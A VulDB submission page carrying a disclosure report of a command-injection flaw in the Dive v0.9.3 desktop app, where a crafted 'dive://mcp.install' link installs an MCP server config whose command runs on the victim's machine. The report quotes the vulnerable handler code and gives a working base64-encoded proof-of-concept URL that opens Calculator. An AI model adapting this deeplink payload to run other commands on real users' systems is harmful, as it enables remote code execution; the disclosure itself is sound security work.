Enviar #642824: Dive v0.9.3 Command Injectioninformación

Título	Dive v0.9.3 Command Injection
Descripción	## Summary We found a remote code execution (RCE) in the latest version (v0.9.3) of [Dive](https://github.com/OpenAgentPlatform/Dive) triggered from a custom url in the form like `dive:`. An attacker can exploit this vulnerability by embedding a specially crafted `dive:` URL on any website. When a victim visits such a site, the browser triggers a prompt to open the Dive app. If the victim confirms opening Dive, Dive will launch and process the URL, leading to remote code execution on the victim’s machine. ## Affected versions <= 0.9.3 (latest) ## PoC ![2025-08-20 20 30 58](https://gist.github.com/user-attachments/assets/98f7ef79-788c-49c8-b38e-8eee3efcd0ea) ## Details Dive supports installing mcp servers from config files, which can be embeded in the custum url. Dive fist processes custom url with code: ```javascript // https://github.com/OpenAgentPlatform/Dive/blob/e4901e9c2b0704688621ae646349af727ad85cfe/electron/main/index.ts#L49-L51 app.on("open-url", (event, url) => { c(win, url) }) ``` The `deeplinkHandler` processes the url with: Inside whichm when the url's host equals to "mcp.install", Dive extracts "name" and "config" parameters. ```javascript // https://github.com/OpenAgentPlatform/Dive/blob/e4901e9c2b0704688621ae646349af727ad85cfe/electron/main/deeplink.ts#L67-L98 case "mcp.install": const deeplink = new URL(url) win?.webContents.send("mcp.install", { name: deeplink.searchParams.get("name") \|\| "", config: deeplink.searchParams.get("config") \|\| "", }) ``` A config is in the form like this: ```json { "mcpServers": { "pwn": { "transport": "stdio", "enabled": true, "command": "open", "args": [ "-a", "/System/Applications/Calculator.app" ], "env": {}, "url": null, "extraData": null, "proxy": null, "headers": null, "exclude_tools": [], "initialTimeout": 10 } } } ``` When the value of "transport" is "stdio", the command will execute with the args. For example, the above config will execute `open -a /System/Applications/Calculator.app`, causing the calculator to pop up. The name value if "pwn" and the config value is: ```json { "transport": "stdio", "enabled": true, "command": "open", "args": [ "-a", "/System/Applications/Calculator.app" ], "env": {}, "url": null, "extraData": null, "proxy": null, "headers": null, "exclude_tools": [], "initialTimeout": 10 } ``` Finally, encode the config with base64, we can construct a custom url as working poc. ``` url ## Input this url in your browser and confirm opeing Dive will lead to the calculator popping up (on Mac). dive://mcp.install/?name=pwn&config=ewogICAgICAidHJhbnNwb3J0IjogInN0ZGlvIiwKICAgICAgImVuYWJsZWQiOiB0cnVlLAogICAgICAiY29tbWFuZCI6ICJvcGVuIiwKICAgICAgImFyZ3MiOiBbCiAgICAgICAgIi1hIiwKICAgICAgICAiL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAiCiAgICAgIF0sCiAgICAgICJlbnYiOiB7fSwKICAgICAgInVybCI6IG51bGwsCiAgICAgICJleHRyYURhdGEiOiBudWxsLAogICAgICAicHJveHkiOiBudWxsLAogICAgICAiaGVhZGVycyI6IG51bGwsCiAgICAgICJleGNsdWRlX3Rvb2xzIjogW10sCiAgICAgICJpbml0aWFsVGltZW91dCI6IDEwCiAgICB9 ``` ## Impact This vulnerability causes remote code execution, impacting the most up to date Dive (v0.9.3). ## Credits Jianjia Yu (suuuuuzy), Zhengyu Liu (jackfromeast)
Fuente	⚠️ https://gist.github.com/Suuuuuzy/0e281e0260d47e51ad3769f5ec8cbae3
Usuario	Jianjia Yu (UID 86953)
Sumisión	2025-08-27 23:19 (hace 10 meses)
Moderación	2025-09-02 09:53 (5 days later)
Estado	Aceptado
Entrada de VulDB	322149 [OpenAgentPlatform Dive hasta 0.9.3 deeplink.ts escalada de privilegios]
Puntos	20

◂ Anterior Visión De Conjunto Próximo ▸

Want to know what is going to be exploited?

We predict KEV entries!